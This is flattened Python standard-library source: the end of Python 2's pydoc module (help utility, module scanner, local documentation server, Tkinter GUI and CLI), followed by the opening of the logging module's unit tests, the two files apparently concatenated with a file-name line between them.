'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'),
'SEQUENCEMETHODS1': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS2 '
'SPECIALMETHODS'),
'SEQUENCEMETHODS2': ('sequence-methods', 'SEQUENCES SEQUENCEMETHODS1 '
'SPECIALMETHODS'),
'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'),
'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT '
'SPECIALMETHODS'),
'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
'NAMESPACES': ('naming', 'global ASSIGNMENT DELETION DYNAMICFEATURES'),
'DYNAMICFEATURES': ('dynamic-features', ''),
'SCOPING': 'NAMESPACES',
'FRAMES': 'NAMESPACES',
'EXCEPTIONS': ('exceptions', 'try except finally raise'),
'COERCIONS': ('coercion-rules','CONVERSIONS'),
'CONVERSIONS': ('conversions', 'COERCIONS'),
'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'),
'SPECIALIDENTIFIERS': ('id-classes', ''),
'PRIVATENAMES': ('atom-identifiers', ''),
'LITERALS': ('atom-literals', 'STRINGS BACKQUOTES NUMBERS '
'TUPLELITERALS LISTLITERALS DICTIONARYLITERALS'),
'TUPLES': 'SEQUENCES',
'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'),
'LISTS': ('typesseq-mutable', 'LISTLITERALS'),
'LISTLITERALS': ('lists', 'LISTS LITERALS'),
'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'),
'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'),
'BACKQUOTES': ('string-conversions', 'repr str STRINGS LITERALS'),
'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr '
'ATTRIBUTEMETHODS'),
'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS1'),
'SLICINGS': ('slicings', 'SEQUENCEMETHODS2'),
'CALLS': ('calls', 'EXPRESSIONS'),
'POWER': ('power', 'EXPRESSIONS'),
'UNARY': ('unary', 'EXPRESSIONS'),
'BINARY': ('binary', 'EXPRESSIONS'),
'SHIFTING': ('shifting', 'EXPRESSIONS'),
'BITWISE': ('bitwise', 'EXPRESSIONS'),
'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'),
'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'),
'ASSERTION': 'assert',
'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'),
'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'),
'DELETION': 'del',
'PRINTING': 'print',
'RETURNING': 'return',
'IMPORTING': 'import',
'CONDITIONAL': 'if',
'LOOPING': ('compound', 'for while break continue'),
'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'),
'DEBUGGING': ('debugger', 'pdb'),
'CONTEXTMANAGERS': ('context-managers', 'with'),
}
def __init__(self, input=None, output=None):
self._input = input
self._output = output
input = property(lambda self: self._input or sys.stdin)
output = property(lambda self: self._output or sys.stdout)
def __repr__(self):
if inspect.stack()[1][3] == '?':
self()
return ''
return '<pydoc.Helper instance>'
_GoInteractive = object()
def __call__(self, request=_GoInteractive):
if request is not self._GoInteractive:
self.help(request)
else:
self.intro()
self.interact()
self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')
def interact(self):
self.output.write('\n')
while True:
try:
request = self.getline('help> ')
if not request: break
except (KeyboardInterrupt, EOFError):
break
request = strip(replace(request, '"', '', "'", ''))
if lower(request) in ('q', 'quit'): break
self.help(request)
def getline(self, prompt):
"""Read one line, using raw_input when available."""
if self.input is sys.stdin:
return raw_input(prompt)
else:
self.output.write(prompt)
self.output.flush()
return self.input.readline()
def help(self, request):
if type(request) is type(''):
request = request.strip()
if request == 'help': self.intro()
elif request == 'keywords': self.listkeywords()
elif request == 'symbols': self.listsymbols()
elif request == 'topics': self.listtopics()
elif request == 'modules': self.listmodules()
elif request[:8] == 'modules ':
self.listmodules(split(request)[1])
elif request in self.symbols: self.showsymbol(request)
elif request in self.keywords: self.showtopic(request)
elif request in self.topics: self.showtopic(request)
elif request: doc(request, 'Help on %s:')
elif isinstance(request, Helper): self()
else: doc(request, 'Help on %s:')
self.output.write('\n')
def intro(self):
self.output.write('''
Welcome to Python %s! This is the online help utility.
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/%s/tutorial/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, or topics, type "modules",
"keywords", or "topics". Each module also comes with a one-line summary
of what it does; to list the modules whose summaries contain a given word
such as "spam", type "modules spam".
''' % tuple([sys.version[:3]]*2))
def list(self, items, columns=4, width=80):
items = items[:]
items.sort()
colw = width / columns
rows = (len(items) + columns - 1) / columns
for row in range(rows):
for col in range(columns):
i = col * rows + row
if i < len(items):
self.output.write(items[i])
if col < columns - 1:
self.output.write(' ' + ' ' * (colw-1 - len(items[i])))
self.output.write('\n')
def listkeywords(self):
self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
self.list(self.keywords.keys())
def listsymbols(self):
self.output.write('''
Here is a list of the punctuation symbols which Python assigns special meaning
to. Enter any symbol to get more help.
''')
self.list(self.symbols.keys())
def listtopics(self):
self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
self.list(self.topics.keys())
def showtopic(self, topic, more_xrefs=''):
try:
import pydoc_data.topics
except ImportError:
self.output.write('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''')
return
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
self.output.write('no documentation found for %s\n' % repr(topic))
return
if type(target) is type(''):
return self.showtopic(target, more_xrefs)
label, xrefs = target
try:
doc = pydoc_data.topics.topics[label]
except KeyError:
self.output.write('no documentation found for %s\n' % repr(topic))
return
pager(strip(doc) + '\n')
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
if xrefs:
import StringIO, formatter
buffer = StringIO.StringIO()
formatter.DumbWriter(buffer).send_flowing_data(
'Related help topics: ' + join(split(xrefs), ', ') + '\n')
self.output.write('\n%s\n' % buffer.getvalue())
def showsymbol(self, symbol):
target = self.symbols[symbol]
topic, _, xrefs = target.partition(' ')
self.showtopic(topic, xrefs)
def listmodules(self, key=''):
if key:
self.output.write('''
Here is a list of matching modules. Enter any module name to get more help.
''')
apropos(key)
else:
self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
modules = {}
def callback(path, modname, desc, modules=modules):
if modname and modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
if find(modname, '.') < 0:
modules[modname] = 1
def onerror(modname):
callback(None, modname, None)
ModuleScanner().run(callback, onerror=onerror)
self.list(modules.keys())
self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
''')
help = Helper()
class Scanner:
"""A generic tree iterator."""
def __init__(self, roots, children, descendp):
self.roots = roots[:]
self.state = []
self.children = children
self.descendp = descendp
def next(self):
if not self.state:
if not self.roots:
return None
root = self.roots.pop(0)
self.state = [(root, self.children(root))]
node, children = self.state[-1]
if not children:
self.state.pop()
return self.next()
child = children.pop(0)
if self.descendp(child):
self.state.append((child, self.children(child)))
return child
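# A minimal sketch of driving Scanner over a nested-list "tree":
#   s = Scanner([[1, [2, 3]]],
#               children=lambda n: list(n) if type(n) is list else [],
#               descendp=lambda n: type(n) is list)
#   s.next(), s.next(), s.next()   # yields 1, then [2, 3], then 2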
class ModuleScanner:
"""An interruptible scanner that searches module synopses."""
def run(self, callback, key=None, completer=None, onerror=None):
if key: key = lower(key)
self.quit = False
seen = {}
for modname in sys.builtin_module_names:
if modname != '__main__':
seen[modname] = 1
if key is None:
callback(None, modname, '')
else:
try:
module_doc = __import__(modname).__doc__
except ImportError:
module_doc = None
desc = split(module_doc or '', '\n')[0]
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(None, modname, desc)
for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror):
if self.quit:
break
if key is None:
callback(None, modname, '')
else:
loader = importer.find_module(modname)
if hasattr(loader,'get_source'):
import StringIO
desc = source_synopsis(
StringIO.StringIO(loader.get_source(modname))
) or ''
if hasattr(loader,'get_filename'):
path = loader.get_filename(modname)
else:
path = None
else:
module = loader.load_module(modname)
desc = module.__doc__.splitlines()[0] if module.__doc__ else ''
path = getattr(module,'__file__',None)
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(path, modname, desc)
if completer:
completer()
def apropos(key):
"""Print all the one-line module summaries that contain a substring."""
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
print modname, desc and '- ' + desc
def onerror(modname):
pass
with warnings.catch_warnings():
warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key, onerror=onerror)
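# For example, apropos('pydoc') prints one line per matching module,
# something like:
#   pydoc - Generate Python documentation in HTML or text for interactive use.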
# --------------------------------------------------- web browser interface
def serve(port, callback=None, completer=None):
import BaseHTTPServer, mimetools, select
# Patch up mimetools.Message so it doesn't break if rfc822 is reloaded.
class Message(mimetools.Message):
def __init__(self, fp, seekable=1):
Message = self.__class__
Message.__bases__[0].__bases__[0].__init__(self, fp, seekable)
self.encodingheader = self.getheader('content-transfer-encoding')
self.typeheader = self.getheader('content-type')
self.parsetype()
self.parseplist()
class DocHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def send_document(self, title, contents):
try:
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(html.page(title, contents))
except IOError: pass
def do_GET(self):
path = self.path
if path[-5:] == '.html': path = path[:-5]
if path[:1] == '/': path = path[1:]
if path and path != '.':
try:
obj = locate(path, forceload=1)
except ErrorDuringImport, value:
self.send_document(path, html.escape(str(value)))
return
if obj:
self.send_document(describe(obj), html.document(obj, path))
else:
self.send_document(path,
'no Python documentation found for %s' % repr(path))
else:
heading = html.heading(
'<big><big><strong>Python: Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
names = filter(lambda x: x != '__main__',
sys.builtin_module_names)
contents = html.multicolumn(names, bltinlink)
indices = ['<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in sys.path:
indices.append(html.index(dir, seen))
contents = heading + join(indices) + '''<p align=right>
<font color="#909090" face="helvetica, arial"><strong>
pydoc</strong> by Ka-Ping Yee <[email protected]></font>'''
self.send_document('Index of Modules', contents)
def log_message(self, *args): pass
class DocServer(BaseHTTPServer.HTTPServer):
def __init__(self, port, callback):
host = 'localhost'
self.address = (host, port)
self.url = 'http://%s:%d/' % (host, port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
def serve_until_quit(self):
import select
self.quit = False
while not self.quit:
rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
if rd: self.handle_request()
def server_activate(self):
self.base.server_activate(self)
if self.callback: self.callback(self)
DocServer.base = BaseHTTPServer.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = Message
try:
try:
DocServer(port, callback).serve_until_quit()
except (KeyboardInterrupt, select.error):
pass
finally:
if completer: completer()
# ----------------------------------------------------- graphical interface
def gui():
"""Graphical interface (starts web server and pops up a control window)."""
class GUI:
def __init__(self, window, port=7464):
self.window = window
self.server = None
self.scanner = None
import Tkinter
self.server_frm = Tkinter.Frame(window)
self.title_lbl = Tkinter.Label(self.server_frm,
text='Starting server...\n ')
self.open_btn = Tkinter.Button(self.server_frm,
text='open browser', command=self.open, state='disabled')
self.quit_btn = Tkinter.Button(self.server_frm,
text='quit serving', command=self.quit, state='disabled')
self.search_frm = Tkinter.Frame(window)
self.search_lbl = Tkinter.Label(self.search_frm, text='Search for')
self.search_ent = Tkinter.Entry(self.search_frm)
self.search_ent.bind('<Return>', self.search)
self.stop_btn = Tkinter.Button(self.search_frm,
text='stop', pady=0, command=self.stop, state='disabled')
if sys.platform == 'win32':
# Trying to hide and show this button crashes under Windows.
self.stop_btn.pack(side='right')
self.window.title('pydoc')
self.window.protocol('WM_DELETE_WINDOW', self.quit)
self.title_lbl.pack(side='top', fill='x')
self.open_btn.pack(side='left', fill='x', expand=1)
self.quit_btn.pack(side='right', fill='x', expand=1)
self.server_frm.pack(side='top', fill='x')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
self.search_frm.pack(side='top', fill='x')
self.search_ent.focus_set()
font = ('helvetica', sys.platform == 'win32' and 8 or 10)
self.result_lst = Tkinter.Listbox(window, font=font, height=6)
self.result_lst.bind('<Button-1>', self.select)
self.result_lst.bind('<Double-Button-1>', self.goto)
self.result_scr = Tkinter.Scrollbar(window,
orient='vertical', command=self.result_lst.yview)
self.result_lst.config(yscrollcommand=self.result_scr.set)
self.result_frm = Tkinter.Frame(window)
self.goto_btn = Tkinter.Button(self.result_frm,
text='go to selected', command=self.goto)
self.hide_btn = Tkinter.Button(self.result_frm,
text='hide results', command=self.hide)
self.goto_btn.pack(side='left', fill='x', expand=1)
self.hide_btn.pack(side='right', fill='x', expand=1)
self.window.update()
self.minwidth = self.window.winfo_width()
self.minheight = self.window.winfo_height()
self.bigminheight = (self.server_frm.winfo_reqheight() +
self.search_frm.winfo_reqheight() +
self.result_lst.winfo_reqheight() +
self.result_frm.winfo_reqheight())
self.bigwidth, self.bigheight = self.minwidth, self.bigminheight
self.expanded = 0
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.window.tk.willdispatch()
import threading
threading.Thread(
target=serve, args=(port, self.ready, self.quit)).start()
def ready(self, server):
self.server = server
self.title_lbl.config(
text='Python documentation server at\n' + server.url)
self.open_btn.config(state='normal')
self.quit_btn.config(state='normal')
def open(self, event=None, url=None):
url = url or self.server.url
try:
import webbrowser
webbrowser.open(url)
except ImportError: # pre-webbrowser.py compatibility
if sys.platform == 'win32':
os.system('start "%s"' % url)
else:
rc = os.system('netscape -remote "openURL(%s)" &' % url)
if rc: os.system('netscape "%s" &' % url)
def quit(self, event=None):
if self.server:
self.server.quit = 1
self.window.quit()
def search(self, event=None):
key = self.search_ent.get()
self.stop_btn.pack(side='right')
self.stop_btn.config(state='normal')
self.search_lbl.config(text='Searching for "%s"...' % key)
self.search_ent.forget()
self.search_lbl.pack(side='left')
self.result_lst.delete(0, 'end')
self.goto_btn.config(state='disabled')
self.expand()
import threading
if self.scanner:
self.scanner.quit = 1
self.scanner = ModuleScanner()
threading.Thread(target=self.scanner.run,
args=(self.update, key, self.done)).start()
def update(self, path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
self.result_lst.insert('end',
modname + ' - ' + (desc or '(no description)'))
def stop(self, event=None):
if self.scanner:
self.scanner.quit = 1
self.scanner = None
def done(self):
self.scanner = None
self.search_lbl.config(text='Search for')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
if sys.platform != 'win32': self.stop_btn.forget()
self.stop_btn.config(state='disabled')
def select(self, event=None):
self.goto_btn.config(state='normal')
def goto(self, event=None):
selection = self.result_lst.curselection()
if selection:
modname = split(self.result_lst.get(selection[0]))[0]
self.open(url=self.server.url + modname + '.html')
def collapse(self):
if not self.expanded: return
self.result_frm.forget()
self.result_scr.forget()
self.result_lst.forget()
self.bigwidth = self.window.winfo_width()
self.bigheight = self.window.winfo_height()
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.expanded = 0
def expand(self):
if self.expanded: return
self.result_frm.pack(side='bottom', fill='x')
self.result_scr.pack(side='right', fill='y')
self.result_lst.pack(side='top', fill='both', expand=1)
self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight))
self.window.wm_minsize(self.minwidth, self.bigminheight)
self.expanded = 1
def hide(self, event=None):
self.stop()
self.collapse()
import Tkinter
try:
root = Tkinter.Tk()
# Tk will crash if pythonw.exe has an XP .manifest
# file and the root is not destroyed explicitly.
# If the problem is ever fixed in Tk, the explicit
# destroy can go.
try:
gui = GUI(root)
root.mainloop()
finally:
root.destroy()
except KeyboardInterrupt:
pass
# -------------------------------------------------- command-line interface
def ispath(x):
return isinstance(x, str) and find(x, os.sep) >= 0
def cli():
"""Command-line interface (looks at sys.argv to decide what to do)."""
import getopt
class BadUsage: pass
# Scripts don't get the current directory in their path by default
# unless they are run with the '-m' switch
if '' not in sys.path:
scriptdir = os.path.dirname(sys.argv[0])
if scriptdir in sys.path:
sys.path.remove(scriptdir)
sys.path.insert(0, '.')
try:
opts, args = getopt.getopt(sys.argv[1:], 'gk:p:w')
writing = 0
for opt, val in opts:
if opt == '-g':
gui()
return
if opt == '-k':
apropos(val)
return
if opt == '-p':
try:
port = int(val)
except ValueError:
raise BadUsage
def ready(server):
print 'pydoc server ready at %s' % server.url
def stopped():
print 'pydoc server stopped'
serve(port, ready, stopped)
return
if opt == '-w':
writing = 1
if not args: raise BadUsage
for arg in args:
if ispath(arg) and not os.path.exists(arg):
print 'file %r does not exist' % arg
break
try:
if ispath(arg) and os.path.isfile(arg):
arg = importfile(arg)
if writing:
if ispath(arg) and os.path.isdir(arg):
writedocs(arg)
else:
writedoc(arg)
else:
help.help(arg)
except ErrorDuringImport, value:
print value
except (getopt.error, BadUsage):
cmd = os.path.basename(sys.argv[0])
print """pydoc - the Python documentation tool
%s <name> ...
Show text documentation on something. <name> may be the name of a
Python keyword, topic, function, module, or package, or a dotted
reference to a class or function within a module or module in a
package. If <name> contains a '%s', it is used as the path to a
Python source file to document. If name is 'keywords', 'topics',
or 'modules', a listing of these things is displayed.
%s -k <keyword>
Search for a keyword in the synopsis lines of all available modules.
%s -p <port>
Start an HTTP server on the given port on the local machine.
%s -g
Pop up a graphical interface for finding and serving documentation.
%s -w <name> ...
Write out the HTML documentation for a module to a file in the current
directory. If <name> contains a '%s', it is treated as a filename; if
it names a directory, documentation is written for all the contents.
""" % (cmd, os.sep, cmd, cmd, cmd, cmd, os.sep)
if __name__ == '__main__': cli()
test_logging.py
# Copyright 2001-2017 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2017 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import copy
import datetime
import pathlib
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import signal
import socket
import struct
import sys
import tempfile
from test.support.script_helper import assert_python_ok, assert_python_failure
from test import support
import textwrap
import threading
import time
import unittest
import warnings
import weakref
import asyncore
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
self._threading_key = support.threading_setup()
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
manager = logging.getLogger().manager
manager.disable = 0
loggerDict = manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
self.doCleanups()
support.threading_cleanup(*self._threading_key)
def assert_log_lines(self, expected_values, stream=None, pat=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(pat or self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
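# For example, with the default expected_log_pat, a captured line
# "spam -> INFO: 3" is matched into the group tuple ('spam', 'INFO', '3').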
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
# Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
# Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_regression_22386(self):
"""See issue #22386 for more information."""
self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')
def test_issue27935(self):
fatal = logging.getLevelName('FATAL')
self.assertEqual(fatal, logging.FATAL)
def test_regression_29220(self):
"""See issue #29220 for more information."""
logging.addLevelName(logging.INFO, '')
self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
self.assertEqual(logging.getLevelName(logging.INFO), '')
self.assertEqual(logging.getLevelName(logging.NOTSET), 'NOTSET')
self.assertEqual(logging.getLevelName('NOTSET'), logging.NOTSET)
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
